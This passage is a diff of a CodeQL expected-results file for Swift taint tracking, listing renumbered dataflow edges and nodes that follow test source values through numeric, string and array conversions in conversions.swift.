conversions.swift:218:13:218:26 | .v | provenance | | -| conversions.swift:219:11:219:11 | withMyValue2 [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | -| conversions.swift:219:11:219:11 | withMyValue2 [v] | conversions.swift:219:11:219:24 | .v | provenance | | -| conversions.swift:219:11:219:24 | .v | conversions.swift:217:2:222:2 | self[return] | provenance | | -| conversions.swift:219:11:219:24 | .v | conversions.swift:221:12:221:12 | self | provenance | | -| conversions.swift:224:20:224:33 | withMyValue [v] | conversions.swift:225:13:225:13 | withMyValue [v] | provenance | | -| conversions.swift:224:20:224:33 | withMyValue [v] | conversions.swift:226:10:226:10 | withMyValue [v] | provenance | | -| conversions.swift:225:13:225:13 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | -| conversions.swift:225:13:225:13 | withMyValue [v] | conversions.swift:225:13:225:25 | .v | provenance | | -| conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:197:6:197:6 | self [v] | provenance | | -| conversions.swift:226:10:226:10 | withMyValue [v] | conversions.swift:226:10:226:22 | .v | provenance | | -| conversions.swift:232:26:232:43 | call to sourceUInt(_:) | conversions.swift:205:7:205:17 | withUInt | provenance | | -| conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | conversions.swift:211:7:211:20 | withMyValue [v] | provenance | | -| conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | provenance | | -| conversions.swift:235:37:235:53 | call to sourceInt(_:) | conversions.swift:235:29:235:54 | call to MyValue.init(_:) [v] | provenance | | -| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | conversions.swift:217:7:217:21 | withMyValue2 [v] | provenance | | -| conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | conversions.swift:238:12:238:56 | call to Int.init(withMyValue2:) | provenance | | -| conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | provenance | | -| conversions.swift:238:38:238:54 | call to sourceInt(_:) | conversions.swift:238:30:238:55 | call to MyValue.init(_:) [v] | provenance | | -| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | conversions.swift:224:20:224:33 | withMyValue [v] | provenance | | -| conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | conversions.swift:241:12:241:61 | call to mkInt(withMyValue:) | provenance | | -| conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:199:7:199:12 | v | provenance | | -| conversions.swift:241:43:241:59 | call to sourceInt(_:) | conversions.swift:241:35:241:60 | call to MyValue.init(_:) [v] | provenance | | +| conversions.swift:45:18:45:38 | call to sourceInt(_:) | conversions.swift:45:12:45:39 | call to Float.init(_:) | provenance | | +| conversions.swift:46:19:46:39 | call to sourceInt(_:) | conversions.swift:46:12:46:40 | call to Double.init(_:) | provenance | | +| conversions.swift:47:19:47:39 | call to sourceInt(_:) | conversions.swift:47:12:47:40 | call to String.init(_:) | provenance | | +| conversions.swift:48:12:48:40 | call to String.init(_:) | conversions.swift:48:12:48:42 | .utf8 | provenance | | +| conversions.swift:48:19:48:39 | call to sourceInt(_:) | conversions.swift:48:12:48:40 | call to String.init(_:) | provenance | | +| conversions.swift:50:12:50:39 | [...] [Collection element] | conversions.swift:51:12:51:12 | arr | provenance | | +| conversions.swift:50:12:50:39 | [...] [Collection element] | conversions.swift:52:12:52:12 | arr [Collection element] | provenance | | +| conversions.swift:50:12:50:39 | [...] [Collection element] | conversions.swift:53:20:53:20 | arr [Collection element] | provenance | | +| conversions.swift:50:12:50:39 | [...] [Collection element] | conversions.swift:54:20:54:20 | arr [Collection element] | provenance | | +| conversions.swift:50:19:50:38 | call to sourceInt(_:) | conversions.swift:50:12:50:39 | [...] [Collection element] | provenance | | +| conversions.swift:52:12:52:12 | arr [Collection element] | conversions.swift:52:12:52:17 | ...[...] | provenance | | +| conversions.swift:53:20:53:20 | arr [Collection element] | conversions.swift:53:12:53:23 | call to Array.init(_:) | provenance | | +| conversions.swift:54:12:54:23 | call to Array.init(_:) [Collection element] | conversions.swift:54:12:54:26 | ...[...] | provenance | | +| conversions.swift:54:20:54:20 | arr [Collection element] | conversions.swift:54:12:54:23 | call to Array.init(_:) [Collection element] | provenance | | +| conversions.swift:55:20:55:42 | call to sourceString(_:) | conversions.swift:55:20:55:44 | .utf8 | provenance | | +| conversions.swift:55:20:55:44 | .utf8 | conversions.swift:55:12:55:48 | call to Array.init(_:) | provenance | | +| conversions.swift:56:12:56:48 | call to Array.init(_:) [Collection element] | conversions.swift:56:12:56:51 | ...[...] | provenance | | +| conversions.swift:56:20:56:42 | call to sourceString(_:) | conversions.swift:56:20:56:44 | .utf8 | provenance | | +| conversions.swift:56:20:56:44 | .utf8 | conversions.swift:56:12:56:48 | call to Array.init(_:) [Collection element] | provenance | | +| conversions.swift:58:13:58:32 | call to sourceInt(_:) | conversions.swift:59:13:59:13 | v | provenance | | +| conversions.swift:62:18:62:50 | call to numericCast(_:) | conversions.swift:63:12:63:12 | v2 | provenance | | +| conversions.swift:62:30:62:49 | call to sourceInt(_:) | conversions.swift:62:18:62:50 | call to numericCast(_:) | provenance | | +| conversions.swift:65:17:65:66 | call to unsafeBitCast(_:to:) | conversions.swift:66:12:66:12 | v4 | provenance | | +| conversions.swift:65:31:65:50 | call to sourceInt(_:) | conversions.swift:65:17:65:66 | call to unsafeBitCast(_:to:) | provenance | | +| conversions.swift:74:11:74:35 | call to abs(_:) | conversions.swift:75:12:75:12 | v7 | provenance | | +| conversions.swift:74:15:74:34 | call to sourceInt(_:) | conversions.swift:74:11:74:35 | call to abs(_:) | provenance | | +| conversions.swift:90:12:90:50 | call to Self.init(_:radix:) [some:0] | conversions.swift:90:12:90:51 | ...! | provenance | | +| conversions.swift:90:16:90:38 | call to sourceString(_:) | conversions.swift:90:12:90:50 | call to Self.init(_:radix:) [some:0] | provenance | | +| conversions.swift:91:12:91:53 | call to Self.init(_:radix:) [some:0] | conversions.swift:91:12:91:54 | ...! | provenance | | +| conversions.swift:91:19:91:41 | call to sourceString(_:) | conversions.swift:91:12:91:53 | call to Self.init(_:radix:) [some:0] | provenance | | +| conversions.swift:93:30:93:49 | call to sourceInt(_:) | conversions.swift:93:12:93:50 | call to Self.init(littleEndian:) | provenance | | +| conversions.swift:94:33:94:55 | call to sourceUInt64(_:) | conversions.swift:94:12:94:56 | call to Self.init(littleEndian:) | provenance | | +| conversions.swift:95:27:95:46 | call to sourceInt(_:) | conversions.swift:95:12:95:47 | call to Self.init(bigEndian:) | provenance | | +| conversions.swift:96:30:96:52 | call to sourceUInt64(_:) | conversions.swift:96:12:96:53 | call to Self.init(bigEndian:) | provenance | | +| conversions.swift:97:12:97:31 | call to sourceInt(_:) | conversions.swift:97:12:97:33 | .littleEndian | provenance | | +| conversions.swift:98:12:98:34 | call to sourceUInt64(_:) | conversions.swift:98:12:98:36 | .littleEndian | provenance | | +| conversions.swift:99:12:99:31 | call to sourceInt(_:) | conversions.swift:99:12:99:33 | .bigEndian | provenance | | +| conversions.swift:100:12:100:34 | call to sourceUInt64(_:) | conversions.swift:100:12:100:36 | .bigEndian | provenance | | +| conversions.swift:137:18:137:39 | call to sourceFloat(_:) | conversions.swift:137:12:137:40 | call to Float.init(_:) | provenance | | +| conversions.swift:139:19:139:40 | call to sourceFloat(_:) | conversions.swift:139:12:139:41 | call to String.init(_:) | provenance | | +| conversions.swift:140:12:140:41 | call to String.init(_:) | conversions.swift:140:12:140:43 | .utf8 | provenance | | +| conversions.swift:140:19:140:40 | call to sourceFloat(_:) | conversions.swift:140:12:140:41 | call to String.init(_:) | provenance | | +| conversions.swift:141:19:141:42 | call to sourceFloat80(_:) | conversions.swift:141:12:141:43 | call to String.init(_:) | provenance | | +| conversions.swift:142:12:142:43 | call to String.init(_:) | conversions.swift:142:12:142:45 | .utf8 | provenance | | +| conversions.swift:142:19:142:42 | call to sourceFloat80(_:) | conversions.swift:142:12:142:43 | call to String.init(_:) | provenance | | +| conversions.swift:143:19:143:41 | call to sourceDouble(_:) | conversions.swift:143:12:143:42 | call to String.init(_:) | provenance | | +| conversions.swift:144:12:144:42 | call to String.init(_:) | conversions.swift:144:12:144:44 | .utf8 | provenance | | +| conversions.swift:144:19:144:41 | call to sourceDouble(_:) | conversions.swift:144:12:144:42 | call to String.init(_:) | provenance | | +| conversions.swift:146:18:146:39 | call to sourceFloat(_:) | conversions.swift:146:12:146:40 | call to Float.init(_:) | provenance | | +| conversions.swift:147:41:147:60 | call to sourceInt(_:) | conversions.swift:147:12:147:79 | call to Float.init(sign:exponent:significand:) | provenance | | +| conversions.swift:148:57:148:78 | call to sourceFloat(_:) | conversions.swift:148:12:148:79 | call to Float.init(sign:exponent:significand:) | provenance | | +| conversions.swift:150:44:150:65 | call to sourceFloat(_:) | conversions.swift:150:12:150:66 | call to Float.init(signOf:magnitudeOf:) | provenance | | +| conversions.swift:152:12:152:33 | call to sourceFloat(_:) | conversions.swift:152:12:152:35 | .exponent | provenance | | +| conversions.swift:153:12:153:33 | call to sourceFloat(_:) | conversions.swift:153:12:153:35 | .significand | provenance | | +| conversions.swift:154:12:154:35 | call to sourceFloat80(_:) | conversions.swift:154:12:154:37 | .exponent | provenance | | +| conversions.swift:155:12:155:35 | call to sourceFloat80(_:) | conversions.swift:155:12:155:37 | .significand | provenance | | +| conversions.swift:156:12:156:34 | call to sourceDouble(_:) | conversions.swift:156:12:156:36 | .exponent | provenance | | +| conversions.swift:157:12:157:34 | call to sourceDouble(_:) | conversions.swift:157:12:157:36 | .significand | provenance | | +| conversions.swift:166:19:166:42 | call to sourceString(_:) | conversions.swift:166:12:166:43 | call to String.init(_:) | provenance | | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) | conversions.swift:174:12:174:45 | call to MyString.init(_:) [some:0] | provenance | | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) | conversions.swift:175:12:175:12 | ms2 | provenance | | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) | conversions.swift:176:12:176:16 | .description | provenance | | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) | conversions.swift:177:12:177:16 | .debugDescription | provenance | | +| conversions.swift:174:12:174:45 | call to MyString.init(_:) [some:0] | conversions.swift:174:12:174:46 | ...! | provenance | | +| conversions.swift:174:12:174:46 | ...! | conversions.swift:175:12:175:12 | ms2 | provenance | | +| conversions.swift:174:12:174:46 | ...! | conversions.swift:176:12:176:16 | .description | provenance | | +| conversions.swift:174:12:174:46 | ...! | conversions.swift:177:12:177:16 | .debugDescription | provenance | | +| conversions.swift:174:21:174:44 | call to sourceString(_:) | conversions.swift:174:12:174:45 | call to MyString.init(_:) | provenance | | +| conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:183:12:183:12 | parent | provenance | | +| conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:184:12:184:12 | parent | provenance | | +| conversions.swift:182:31:182:54 | call to sourceString(_:) | conversions.swift:186:40:186:40 | parent | provenance | | +| conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | conversions.swift:187:12:187:12 | v3 | provenance | | +| conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | conversions.swift:188:12:188:12 | v3 | provenance | | +| conversions.swift:186:40:186:40 | parent | conversions.swift:186:25:186:69 | call to unsafeDowncast(_:to:) | provenance | | +| conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:203:13:203:13 | arr1 | provenance | | +| conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:205:13:205:19 | ...[...] | provenance | | +| conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:208:25:208:25 | arr1 | provenance | | +| conversions.swift:201:14:201:33 | call to sourceArray(_:) | conversions.swift:215:31:215:31 | arr1 | provenance | | +| conversions.swift:202:14:202:33 | [...] [Collection element] | conversions.swift:204:13:204:13 | arr2 | provenance | | +| conversions.swift:202:14:202:33 | [...] [Collection element] | conversions.swift:206:13:206:13 | arr2 [Collection element] | provenance | | +| conversions.swift:202:14:202:33 | [...] [Collection element] | conversions.swift:209:25:209:25 | arr2 [Collection element] | provenance | | +| conversions.swift:202:14:202:33 | [...] [Collection element] | conversions.swift:216:31:216:31 | arr2 [Collection element] | provenance | | +| conversions.swift:202:15:202:32 | call to sourceInt(_:) | conversions.swift:202:14:202:33 | [...] [Collection element] | provenance | | +| conversions.swift:206:13:206:13 | arr2 [Collection element] | conversions.swift:206:13:206:19 | ...[...] | provenance | | +| conversions.swift:208:19:208:29 | call to Array.init(_:) [Collection element] | conversions.swift:210:13:210:13 | arr1b | provenance | | +| conversions.swift:208:19:208:29 | call to Array.init(_:) [Collection element] | conversions.swift:212:13:212:13 | arr1b [Collection element] | provenance | | +| conversions.swift:208:25:208:25 | arr1 | conversions.swift:208:19:208:29 | call to Array.init(_:) [Collection element] | provenance | | +| conversions.swift:209:19:209:29 | call to Array.init(_:) [Collection element] | conversions.swift:211:13:211:13 | arr2b | provenance | | +| conversions.swift:209:19:209:29 | call to Array.init(_:) [Collection element] | conversions.swift:213:13:213:13 | arr2b [Collection element] | provenance | | +| conversions.swift:209:25:209:25 | arr2 [Collection element] | conversions.swift:209:19:209:29 | call to Array.init(_:) [Collection element] | provenance | | +| conversions.swift:212:13:212:13 | arr1b [Collection element] | conversions.swift:212:13:212:20 | ...[...] | provenance | | +| conversions.swift:213:13:213:13 | arr2b [Collection element] | conversions.swift:213:13:213:20 | ...[...] | provenance | | +| conversions.swift:215:15:215:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:217:13:217:13 | arr1c | provenance | | +| conversions.swift:215:15:215:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:219:13:219:13 | arr1c [Collection element] | provenance | | +| conversions.swift:215:31:215:31 | arr1 | conversions.swift:215:15:215:35 | call to ContiguousArray.init(_:) [Collection element] | provenance | | +| conversions.swift:216:15:216:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:218:13:218:13 | arr2c | provenance | | +| conversions.swift:216:15:216:35 | call to ContiguousArray.init(_:) [Collection element] | conversions.swift:220:13:220:13 | arr2c [Collection element] | provenance | | +| conversions.swift:216:31:216:31 | arr2 [Collection element] | conversions.swift:216:15:216:35 | call to ContiguousArray.init(_:) [Collection element] | provenance | | +| conversions.swift:219:13:219:13 | arr1c [Collection element] | conversions.swift:219:13:219:20 | ...[...] | provenance | | +| conversions.swift:220:13:220:13 | arr2c [Collection element] | conversions.swift:220:13:220:20 | ...[...] | provenance | | +| conversions.swift:227:6:227:6 | self [v] | file://:0:0:0:0 | self [v] | provenance | | +| conversions.swift:229:7:229:12 | v | conversions.swift:230:12:230:12 | v | provenance | | +| conversions.swift:230:3:230:3 | [post] self [v] | conversions.swift:229:2:231:2 | self[return] [v] | provenance | | +| conversions.swift:230:12:230:12 | v | conversions.swift:230:3:230:3 | [post] self [v] | provenance | | +| conversions.swift:235:7:235:17 | withUInt | conversions.swift:236:13:236:13 | withUInt | provenance | | +| conversions.swift:241:7:241:20 | withMyValue [v] | conversions.swift:242:13:242:13 | withMyValue [v] | provenance | | +| conversions.swift:242:13:242:13 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | provenance | | +| conversions.swift:242:13:242:13 | withMyValue [v] | conversions.swift:242:13:242:25 | .v | provenance | | +| conversions.swift:247:7:247:21 | withMyValue2 [v] | conversions.swift:248:13:248:13 | withMyValue2 [v] | provenance | | +| conversions.swift:247:7:247:21 | withMyValue2 [v] | conversions.swift:249:11:249:11 | withMyValue2 [v] | provenance | | +| conversions.swift:248:13:248:13 | withMyValue2 [v] | conversions.swift:227:6:227:6 | self [v] | provenance | | +| conversions.swift:248:13:248:13 | withMyValue2 [v] | conversions.swift:248:13:248:26 | .v | provenance | | +| conversions.swift:249:11:249:11 | withMyValue2 [v] | conversions.swift:227:6:227:6 | self [v] | provenance | | +| conversions.swift:249:11:249:11 | withMyValue2 [v] | conversions.swift:249:11:249:24 | .v | provenance | | +| conversions.swift:249:11:249:24 | .v | conversions.swift:247:2:252:2 | self[return] | provenance | | +| conversions.swift:249:11:249:24 | .v | conversions.swift:251:12:251:12 | self | provenance | | +| conversions.swift:254:20:254:33 | withMyValue [v] | conversions.swift:255:13:255:13 | withMyValue [v] | provenance | | +| conversions.swift:254:20:254:33 | withMyValue [v] | conversions.swift:256:10:256:10 | withMyValue [v] | provenance | | +| conversions.swift:255:13:255:13 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | provenance | | +| conversions.swift:255:13:255:13 | withMyValue [v] | conversions.swift:255:13:255:25 | .v | provenance | | +| conversions.swift:256:10:256:10 | withMyValue [v] | conversions.swift:227:6:227:6 | self [v] | provenance | | +| conversions.swift:256:10:256:10 | withMyValue [v] | conversions.swift:256:10:256:22 | .v | provenance | | +| conversions.swift:262:26:262:43 | call to sourceUInt(_:) | conversions.swift:235:7:235:17 | withUInt | provenance | | +| conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | conversions.swift:241:7:241:20 | withMyValue [v] | provenance | | +| conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | provenance | | +| conversions.swift:265:37:265:53 | call to sourceInt(_:) | conversions.swift:265:29:265:54 | call to MyValue.init(_:) [v] | provenance | | +| conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | conversions.swift:247:7:247:21 | withMyValue2 [v] | provenance | | +| conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | conversions.swift:268:12:268:56 | call to Int.init(withMyValue2:) | provenance | | +| conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | provenance | | +| conversions.swift:268:38:268:54 | call to sourceInt(_:) | conversions.swift:268:30:268:55 | call to MyValue.init(_:) [v] | provenance | | +| conversions.swift:271:35:271:60 | call to MyValue.init(_:) [v] | conversions.swift:254:20:254:33 | withMyValue [v] | provenance | | +| conversions.swift:271:35:271:60 | call to MyValue.init(_:) [v] | conversions.swift:271:12:271:61 | call to mkInt(withMyValue:) | provenance | | +| conversions.swift:271:43:271:59 | call to sourceInt(_:) | conversions.swift:229:7:229:12 | v | provenance | | +| conversions.swift:271:43:271:59 | call to sourceInt(_:) | conversions.swift:271:35:271:60 | call to MyValue.init(_:) [v] | provenance | | | file://:0:0:0:0 | [post] self [first] | stringinterpolation.swift:6:6:6:6 | self [Return] [first] | provenance | | | file://:0:0:0:0 | [post] self [second] | stringinterpolation.swift:7:6:7:6 | self [Return] [second] | provenance | | | file://:0:0:0:0 | self [first] | file://:0:0:0:0 | .first | provenance | | @@ -210,166 +217,179 @@ edges | try.swift:18:18:18:25 | call to source() [some:0] | try.swift:18:13:18:25 | try? ... [some:0] | provenance | | nodes | conversions.swift:32:12:32:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:35:12:35:38 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | -| conversions.swift:35:18:35:37 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:36:12:36:39 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:36:19:36:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:37:12:37:39 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:37:12:37:41 | .utf8 | semmle.label | .utf8 | -| conversions.swift:37:19:37:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:39:12:39:39 | [...] [Collection element] | semmle.label | [...] [Collection element] | -| conversions.swift:39:19:39:38 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:40:12:40:12 | arr | semmle.label | arr | -| conversions.swift:41:12:41:12 | arr [Collection element] | semmle.label | arr [Collection element] | -| conversions.swift:41:12:41:17 | ...[...] | semmle.label | ...[...] | -| conversions.swift:42:12:42:23 | call to Array.init(_:) | semmle.label | call to Array.init(_:) | -| conversions.swift:42:20:42:20 | arr [Collection element] | semmle.label | arr [Collection element] | -| conversions.swift:43:12:43:23 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | -| conversions.swift:43:12:43:26 | ...[...] | semmle.label | ...[...] | -| conversions.swift:43:20:43:20 | arr [Collection element] | semmle.label | arr [Collection element] | -| conversions.swift:44:12:44:48 | call to Array.init(_:) | semmle.label | call to Array.init(_:) | -| conversions.swift:44:20:44:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | -| conversions.swift:44:20:44:44 | .utf8 | semmle.label | .utf8 | -| conversions.swift:45:12:45:48 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | -| conversions.swift:45:12:45:51 | ...[...] | semmle.label | ...[...] | -| conversions.swift:45:20:45:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | -| conversions.swift:45:20:45:44 | .utf8 | semmle.label | .utf8 | -| conversions.swift:47:13:47:32 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:48:13:48:13 | v | semmle.label | v | -| conversions.swift:51:18:51:50 | call to numericCast(_:) | semmle.label | call to numericCast(_:) | -| conversions.swift:51:30:51:49 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:52:12:52:12 | v2 | semmle.label | v2 | -| conversions.swift:54:17:54:66 | call to unsafeBitCast(_:to:) | semmle.label | call to unsafeBitCast(_:to:) | -| conversions.swift:54:31:54:50 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:55:12:55:12 | v4 | semmle.label | v4 | -| conversions.swift:63:11:63:35 | call to abs(_:) | semmle.label | call to abs(_:) | -| conversions.swift:63:15:63:34 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:64:12:64:12 | v7 | semmle.label | v7 | -| conversions.swift:75:12:75:50 | call to Self.init(_:radix:) [some:0] | semmle.label | call to Self.init(_:radix:) [some:0] | -| conversions.swift:75:12:75:51 | ...! | semmle.label | ...! | -| conversions.swift:75:16:75:38 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | -| conversions.swift:77:12:77:50 | call to Self.init(littleEndian:) | semmle.label | call to Self.init(littleEndian:) | -| conversions.swift:77:30:77:49 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:78:12:78:47 | call to Self.init(bigEndian:) | semmle.label | call to Self.init(bigEndian:) | -| conversions.swift:78:27:78:46 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:79:12:79:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:79:12:79:33 | .littleEndian | semmle.label | .littleEndian | -| conversions.swift:80:12:80:31 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:80:12:80:33 | .bigEndian | semmle.label | .bigEndian | -| conversions.swift:108:12:108:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:109:12:109:40 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | -| conversions.swift:109:18:109:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:111:12:111:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:111:19:111:40 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:112:12:112:41 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:112:12:112:43 | .utf8 | semmle.label | .utf8 | -| conversions.swift:112:19:112:40 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:113:12:113:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:113:19:113:42 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | -| conversions.swift:114:12:114:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:114:12:114:45 | .utf8 | semmle.label | .utf8 | -| conversions.swift:114:19:114:42 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | -| conversions.swift:115:12:115:42 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:115:19:115:41 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | -| conversions.swift:116:12:116:42 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:116:12:116:44 | .utf8 | semmle.label | .utf8 | -| conversions.swift:116:19:116:41 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | -| conversions.swift:118:12:118:40 | call to Float.init(_:) | semmle.label | call to Float.init(_:) | -| conversions.swift:118:18:118:39 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:119:12:119:79 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | -| conversions.swift:119:41:119:60 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:120:12:120:79 | call to Float.init(sign:exponent:significand:) | semmle.label | call to Float.init(sign:exponent:significand:) | -| conversions.swift:120:57:120:78 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:122:12:122:66 | call to Float.init(signOf:magnitudeOf:) | semmle.label | call to Float.init(signOf:magnitudeOf:) | -| conversions.swift:122:44:122:65 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:124:12:124:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:124:12:124:35 | .exponent | semmle.label | .exponent | -| conversions.swift:125:12:125:33 | call to sourceFloat(_:) | semmle.label | call to sourceFloat(_:) | -| conversions.swift:125:12:125:35 | .significand | semmle.label | .significand | -| conversions.swift:126:12:126:35 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | -| conversions.swift:126:12:126:37 | .exponent | semmle.label | .exponent | -| conversions.swift:127:12:127:35 | call to sourceFloat80(_:) | semmle.label | call to sourceFloat80(_:) | -| conversions.swift:127:12:127:37 | .significand | semmle.label | .significand | -| conversions.swift:128:12:128:34 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | -| conversions.swift:128:12:128:36 | .exponent | semmle.label | .exponent | -| conversions.swift:129:12:129:34 | call to sourceDouble(_:) | semmle.label | call to sourceDouble(_:) | -| conversions.swift:129:12:129:36 | .significand | semmle.label | .significand | -| conversions.swift:135:12:135:35 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | -| conversions.swift:136:12:136:43 | call to String.init(_:) | semmle.label | call to String.init(_:) | -| conversions.swift:136:19:136:42 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) | semmle.label | call to MyString.init(_:) | -| conversions.swift:144:12:144:45 | call to MyString.init(_:) [some:0] | semmle.label | call to MyString.init(_:) [some:0] | -| conversions.swift:144:12:144:46 | ...! | semmle.label | ...! | -| conversions.swift:144:21:144:44 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | -| conversions.swift:145:12:145:12 | ms2 | semmle.label | ms2 | -| conversions.swift:146:12:146:16 | .description | semmle.label | .description | -| conversions.swift:147:12:147:16 | .debugDescription | semmle.label | .debugDescription | -| conversions.swift:152:31:152:54 | call to sourceString(_:) | semmle.label | call to sourceString(_:) | -| conversions.swift:153:12:153:12 | parent | semmle.label | parent | -| conversions.swift:154:12:154:12 | parent | semmle.label | parent | -| conversions.swift:156:25:156:69 | call to unsafeDowncast(_:to:) | semmle.label | call to unsafeDowncast(_:to:) | -| conversions.swift:156:40:156:40 | parent | semmle.label | parent | -| conversions.swift:157:12:157:12 | v3 | semmle.label | v3 | -| conversions.swift:158:12:158:12 | v3 | semmle.label | v3 | -| conversions.swift:171:14:171:33 | call to sourceArray(_:) | semmle.label | call to sourceArray(_:) | -| conversions.swift:172:14:172:33 | [...] [Collection element] | semmle.label | [...] [Collection element] | -| conversions.swift:172:15:172:32 | call to sourceInt(_:) | semmle.label | call to sourceInt(_:) | -| conversions.swift:173:13:173:13 | arr1 | semmle.label | arr1 | -| conversions.swift:174:13:174:13 | arr2 | semmle.label | arr2 | -| conversions.swift:175:13:175:19 | ...[...] | semmle.label | ...[...] | -| conversions.swift:176:13:176:13 | arr2 [Collection element] | semmle.label | arr2 [Collection element] | -| conversions.swift:176:13:176:19 | ...[...] | semmle.label | ...[...] | -| conversions.swift:178:19:178:29 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | -| conversions.swift:178:25:178:25 | arr1 | semmle.label | arr1 | -| conversions.swift:179:19:179:29 | call to Array.init(_:) [Collection element] | semmle.label | call to Array.init(_:) [Collection element] | -| conversions.swift:179:25:179:25 | arr2 [Collection element] | semmle.label | arr2 [Collection element] | -| conversions.swift:180:13:180:13 | arr1b | semmle.label | arr1b | -| conversions.swift:181:13:181:13 | arr2b | semmle.label | arr2b | -| conversions.swift:182:13:182:13 | arr1b [Collection element] | semmle.label | arr1b [Collection element] | -| conversions.swift:182:13:182:20 | ...[...] | semmle.label | ...[...] | -| conversions.swift:183:13:183:13 | arr2b [Collection element] | semmle.label | arr2b [Collection element] | -| conversions.swift:183:13:183:20 | ...[...] | semmle.label | ...[...] | -| conversions.swift:185:15:185:35 | call to ContiguousArray.init(_:) [Collection element] | semmle.label | call to ContiguousArray.init(_:) [Collection element] | -| conversions.swift:185:31:185:31 | arr1 | semmle.label | arr1 | -| conversions.swift:186:15:186:35 | call to ContiguousArray.init(_:) [Collection element] | semmle.label | call to ContiguousArray.init(_:) [Collection element] | -| conversions.swift:186:31:186:31 | arr2 [Collection element] | semmle.label | arr2 [Collection element] | -| conversions.swift:187:13:187:13 | arr1c | semmle.label | arr1c | -| conversions.swift:188:13:188:13 | arr2c | semmle.label | arr2c | -| conversions.swift:189:13:189:13 | 